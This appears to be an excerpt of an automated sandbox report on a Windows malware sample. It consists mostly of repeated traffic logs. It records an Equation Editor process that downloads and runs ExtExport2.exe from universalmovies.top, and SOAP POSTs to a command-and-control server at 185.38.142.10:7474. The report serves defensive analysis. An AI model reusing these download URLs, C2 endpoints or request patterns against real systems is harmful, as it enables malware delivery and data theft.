                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.38.142.10:7474
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC14B LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC14B
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.38.142.10:7474Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.38.142.10:7474Content-Length: 246270Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.38.142.10:7474Content-Length: 246262Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: Joe Sandbox ViewIP Address: 172.67.162.95 172.67.162.95
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: NETSOLUTIONSNL NETSOLUTIONSNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: global trafficHTTP traffic detected: GET /ExtExport2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC14B LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC14B
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EF2D272F-8010-4272-8E46-58178AC2768F}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /ExtExport2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: universalmovies.top
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474/
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: RegSvcs.exe, 00000006.00000002.387739574.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/s
